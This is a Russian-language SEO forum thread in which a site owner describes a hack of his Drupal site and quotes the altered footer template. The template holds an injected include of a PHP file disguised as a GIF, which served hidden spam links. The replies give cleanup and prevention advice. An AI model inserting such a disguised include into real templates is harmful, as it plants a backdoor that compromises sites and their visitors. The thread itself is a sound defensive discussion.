Взломали сайт на Drupal - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

2 страниц

1 2 >

Взломали сайт на Drupal, как избавится от вируса

Опции

jjoret

Topic Starter

9.7.2014, 3:14; Ответить: jjoret

Сообщение #1

Завсегдатай

Группа: Active User
Сообщений: 791
Регистрация: 29.11.2011
Из: Беларусь
Поблагодарили: 170 раз
Репутация:

Здравствуйте. Недавно взломали мой сайт на друпале, а я думал самая безопасная кмс, вставили код в футер, на некоторых страницах отображались ссылки с околоссылочным текстом в маленьком шрифте на том месте, очень похоже на биржу ссылок. Вот код:

Код

<?php
if(render($page['footer'])){
print '<div class="footer"><div class="wrapper">'.render($page['footer']); @include_once($_SERVER['DOCUMENT_ROOT'].'/modules/color/header.gif'); print '</div></div>';
}
if(render($page['hide'])){
print render($page['hide']);
}
?>

собственно вирус: @include_once($_SERVER['DOCUMENT_ROOT'].'/modules/color/header.gif'
Этот гиф-файл зашифрован под пхп-код. В общем я его удалил, но вопрос возник: одно дело залить файл на хостинг, другое - изменить код и вставить туда ссылку на вирус-файл. То есть должен быть еще где-то загрузчик, с помощью которого взломщик может закачивать все что хочет. К знатокам Друпала, кто что думает по этому поводу? и как это все удалить и не допустить впредь?

--------------------

Выход в топ неизбежен!

Ответить с цитированием данного сообщения

DVORYAN DVORYAN 9.7.2014, 4:34; Сообщений: 366 Поблагодарили: 115 раз Репутация: 18 Просмотр профиля	9.7.2014, 4:34; Ответить: DVORYAN Сообщение #2
Бывалый Группа: User Сообщений: 366 Регистрация: 16.2.2009 Из: Нижний Новгород Поблагодарили: 115 раз Репутация: 18	Какая версия Drupal, у меня старые версии взламывали, после обновления ядра и всех модулей взломы прекратились.

kagtus kagtus 9.7.2014, 6:18; Сообщений: 421 Поблагодарили: 95 раз Репутация: 22 Просмотр профиля	9.7.2014, 6:18; Ответить: kagtus Сообщение #3
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22	айболитом проверьте и движок/модули обновите. P.S. самая безопасная - не значит что ее нельзя взломать -------------------- ася 45два48499два удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ Поблагодарили: (1) andreykashops

Infacto Infacto 9.7.2014, 9:40; Сообщений: 1037 Поблагодарили: 406 раз Репутация: 87 Просмотр профиля	9.7.2014, 9:40; Ответить: Infacto Сообщение #4
Старожил Группа: Active User Сообщений: 1037 Регистрация: 19.9.2011 Из: www Поблагодарили: 406 раз Репутация: 87	Была такая же беда на ВП, удалил файл, сменил пароли(фтп, хостинг, админка), удалил код, просмотрел все файлы с датой изменения которые я не вносил. Больше такого не было. -------------------- ~~~ Продам шаблона финансового сайта на WP ~~~

jjoret Topic Starter jjoretTopic Starter 9.7.2014, 14:44; Сообщений: 791 Поблагодарили: 170 раз Репутация: 45 Просмотр профиля	Topic Starter 9.7.2014, 14:44; Ответить: jjoret Сообщение #5
Завсегдатай Группа: Active User Сообщений: 791 Регистрация: 29.11.2011 Из: Беларусь Поблагодарили: 170 раз Репутация: 45	А кто-нибудь догодывается как взломщик смог поменять код в файле шаблона? -------------------- Выход в топ неизбежен!

Infacto Infacto 9.7.2014, 15:41; Сообщений: 1037 Поблагодарили: 406 раз Репутация: 87 Просмотр профиля	9.7.2014, 15:41; Ответить: Infacto Сообщение #6
Старожил Группа: Active User Сообщений: 1037 Регистрация: 19.9.2011 Из: www Поблагодарили: 406 раз Репутация: 87	jjoret, Думаю через плагин, плагины тоже обновлял. А может и через хостинг (у меня от верблюда) -------------------- ~~~ Продам шаблона финансового сайта на WP ~~~

Rampage Rampage 9.7.2014, 16:20; Сообщений: 242 Поблагодарили: 69 раз Репутация: 24 Просмотр профиля	9.7.2014, 16:20; Ответить: Rampage Сообщение #7
Участник Группа: User Сообщений: 242 Регистрация: 20.11.2010 Из: localhost Поблагодарили: 69 раз Репутация: 24	ищите шелл изначально айболитом как посоветовали выше, если на одном акаунте есть еще сайты по соседству вполне могли получить доступ через них, ну и после чистки грамотно выставить права -------------------- 🔥Интернет магазин теплотехники FARRO

webpavilion webpavilion 9.7.2014, 16:23; Сообщений: 2726 Поблагодарили: 1659 раз Репутация: 171 Просмотр профиля	9.7.2014, 16:23; Ответить: webpavilion Сообщение #8
сеошник на пенсии Группа: Active User Сообщений: 2726 Регистрация: 28.4.2009 Из: МО Поблагодарили: 1659 раз Репутация: 171	Если ломанули именно drupal, а не соседний сайт или пароль к FTP и вам не мстит один из бывших создателей, то с вероятностью в 99.9% процента стоит какая нибудь древность которую нужно обновить было года полтора назад. В стоковых эксплоит паках максимум что ломаеться по ядру до 7.12 и 6.24 и то там с оговорками и удобным стечением обстоятельств. А еще может собрали так криворуко что анонимам можно php прямо из формы комментариев исполнять или бекдор залили на всякий. А так да, самая безопасная. -------------------- Не ведитесь, cамопис это почти всегда плохо! Делаю сайты на Drupal 7.x (очень дорого)

jjoret Topic Starter jjoretTopic Starter 9.7.2014, 18:14; Сообщений: 791 Поблагодарили: 170 раз Репутация: 45 Просмотр профиля	Topic Starter 9.7.2014, 18:14; Ответить: jjoret Сообщение #9
Завсегдатай Группа: Active User Сообщений: 791 Регистрация: 29.11.2011 Из: Беларусь Поблагодарили: 170 раз Репутация: 45	Допустим я удалил вирус, но мне нужно быть уверенным, что в дальнейшем не случится подобного, ведь это я заметил чисто случайно. Может есть какая-то программа или сервис чтобы автоматически чекал ссылки со всех страниц сайта, типа как Xenu? -------------------- Выход в топ неизбежен!

Drupal_way Drupal_way 12.7.2014, 14:23; Сообщений: 410 Поблагодарили: 73 раза Репутация: 6 Просмотр профиля	12.7.2014, 14:23; Ответить: Drupal_way Сообщение #10
Бывалый Группа: User Сообщений: 410 Регистрация: 17.12.2011 Из: Ростов-на-Дону Поблагодарили: 73 раза Репутация: 6	Чтобы это не повторилось - обновляйте друпал и модуля. Проверка ссылок тут http://www.linkpad.ru/ -------------------- Машина сайтов "SM". Создание сложных, продающих проектов на Drupal

« Предыдущая тема · Программная часть · Следующая тема »

2 страниц

1 2 >

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Ваш сайт блокирует Роскомнадзор?	27	hollywooduk	5700	Вчера, 0:19 автор: Omaxis
Прототипирование + дизайн + вёрстка = красивый и эффективный сайт под ключ	0	bunneh	272	16.4.2024, 18:02 автор: bunneh
Если в сайт с одними ключами, которые там долго, добавить новую рубрику с новыми ключами	2	Tutich	1123	16.4.2024, 8:27 автор: Tutich
[Услуги] Баннер/Графика/Сайт	240	FillPlay	180495	31.3.2024, 22:58 автор: FillPlay
Тысячи ботовых переходов на сайт	18	Suagaring	4612	26.3.2024, 21:42 автор: c4p1t4l15t

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 18.4.2024, 8:25

Дизайн